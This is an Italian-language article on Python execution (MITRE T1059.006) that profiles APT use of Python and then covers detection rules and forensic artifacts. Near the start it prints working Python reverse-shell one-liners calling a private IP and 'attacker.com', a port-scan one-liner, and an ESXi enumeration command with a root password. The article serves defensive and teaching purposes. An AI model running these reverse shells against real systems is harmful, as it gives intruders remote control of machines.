Esecuzione Python: Command and Scripting Interpreter: Python (T1059.006)

La simulazione di attacchi Python richiede comprensione delle tecniche utilizzate dai threat actor reali. APT29 e Turla hanno dimostrato come Python possa bypassare controlli di sicurezza tradizionali.

Per Windows, l'esecuzione interattiva avviene tramite: python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

Su macOS, Kimsuky ha utilizzato implant Python per raccolta dati. La simulazione prevede: python3 -c "import os,pty,socket;s=socket.socket();s.connect(('attacker.com',443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn('/bin/bash')"

Linux offre possibilità avanzate attraverso librerie di sistema. Earth Lusca ha dimostrato l'efficacia di script per port scanning: python3 -c "import socket;[(s:=socket.socket()).connect_ex(('target',p))or print(f'Port {p} open')for p in range(1,1024)]"

Per ambienti ESXi, UNC3886 ha utilizzato script per enumerazione: python3 enum_vms.py --host localhost --user root --password 'VMware1!'

La compilazione in eseguibili standalone aumenta la furtività. PyInstaller permette di creare binari auto-contenuti che non richiedono Python installato sul target. DropBook utilizza questa tecnica per mascherare backdoor Python come applicazioni legittime.

La detection efficace richiede focus su pattern comportamentali anomali piuttosto che signature statiche. Gli script Python legittimi sono comuni in ambiente enterprise, rendendo cruciale il contesto di esecuzione.

Monitorate processi parent sospetti tramite Sysmon EventID 1. Quando winword.exe o mshta.exe generano python.exe, investigate immediatamente. MuddyWater utilizza macro Office per lanciare interpreti Python.

Su Windows, configurate detection per:

• Python eseguito da directory temporanee (%TEMP%, %APPDATA%)
• Parametri -c con comandi inline sospetti
• Python che genera connessioni di rete non autorizzate

Per macOS, Unified Logging cattura esecuzioni Python. Cercate pattern come: python3 seguito da curl o osascript nella stessa sessione Terminal. CoinTicker utilizza questa sequenza per download di payload secondari.

Linux richiede monitoring di auditd per execve syscalls. Flag immediato per:

• Script Python in /tmp o directory nascoste
• Esecuzione da cron job non documentati
• Python che accede a /proc//mem* (possibile injection)

L'automazione tramite SIEM riduce i falsi positivi. Correlate eventi Python con:

• Download recenti di file .py
• Modifiche a scheduled task
• Connessioni a IP/domini non categorizzati

La ricostruzione forense di attacchi Python richiede analisi multi-livello. Gli artefatti variano significativamente tra sistemi operativi.

Su Windows, esaminate:

• Prefetch files per tracce di python.exe o py.exe
• Registry UserAssist per esecuzioni da GUI
• WindowsApps per Python Store installations utilizzate da Contagious Interview

I file .pyc (bytecode compilato) nella directory pycache rivelano script eseguiti. Decompilate con uncompyle6 per recuperare codice sorgente. Machete lascia tracce di moduli Python custom in queste directory.

Per macOS, analizzate:

• ~/Library/Logs/python.log per errori di esecuzione
• Launch Agents/Daemons contenenti riferimenti Python
• Quarantine events per script scaricati (com.apple.quarantine)

Linux preserva evidenze in:

• /var/log/auth.log per esecuzioni sudo di Python
• History files (.bash_history, .python_history)
• Systemd journal per servizi Python-based

La timeline deve correlare:

1. Primo accesso al sistema
2. Download/creazione script Python
3. Esecuzione iniziale e successive
4. Comunicazioni di rete generate
5. Modifiche al filesystem risultanti

Operation Wocao ha dimostrato come backdoor Python compilate con py2exe lascino tracce distintive nel PE header, facilitando l'attribuzione.

L'analisi dei pattern di utilizzo Python rivela indicatori comportamentali distintivi per profilazione APT.

APT29 (Russia) privilegia sviluppo custom di malware Python. I loro tool mostrano sofisticazione nel code obfuscation e uso di librerie crittografiche avanzate. Aspettatevi evoluzione verso Python 3.11+ per performance migliorate.

Turla integra IronPython in toolchain .NET complesse. La combinazione Python/.NET indica targeting di ambienti Windows enterprise con difese mature. Il gruppo mantiene retrocompatibilità con Python 2.7 per legacy systems.

Kimsuky (Corea del Nord) focalizza su data exfiltration via Python. I loro MailFetcher.py variants dimostrano interesse per credenziali email e documenti Office. Evolution verso scraping di cloud services è probabile.

MuddyWater (Iran) utilizza Python per tool modulari come Out1. Pattern ricorrente: dropper PowerShell → download Python → esecuzione in-memory. Anticipate shift verso WebAssembly Python per browser-based attacks.

Gli overlap di infrastructure sono significativi. Earth Lusca e Rocke condividono Python cryptominer variants, suggerendo tool sharing nel cybercrime ecosystem. Monitorate:

• Repository GitHub/GitLab per tool leak
• Underground forum per Python exploit kit
• Commodity malware Python-based evolution

Campaign analysis mostra trend verso Python living-off-the-land. Cutting Edge ha utilizzato PySoxy già presente su appliance Ivanti, eliminando necessità di upload. Future campagne sfrutteranno Python embedded in IoT/OT devices.

Framework MITRE ATT&CK documenta utilizzo Python da 17 APT groups. Campagne Cutting Edge (UNC5221/UNC5325) e Operation Wocao dimostrano evoluzione delle tecniche. Risorse detection: Sigma rules python_execution_suspicious, Elastic python_reverse_shell detection. Reference: CISA Alert AA23-319A su Python post-exploitation trends.